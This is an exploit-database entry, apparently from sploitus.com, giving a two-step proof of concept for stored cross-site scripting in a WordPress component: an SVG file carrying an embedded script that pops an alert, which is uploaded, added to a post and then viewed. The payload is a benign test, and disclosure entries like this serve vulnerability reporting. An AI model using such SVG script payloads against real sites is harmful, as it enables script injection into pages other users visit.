Share
## https://sploitus.com/exploit?id=WPEX-ID:4AC03907-2373-48F0-BCA1-8F7073C06B18
1. Upload a malicious SVG: <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <script type="text/javascript"> alert("XSS Test"); </script> </svg>

2. Add to post and view SVG to see XSS.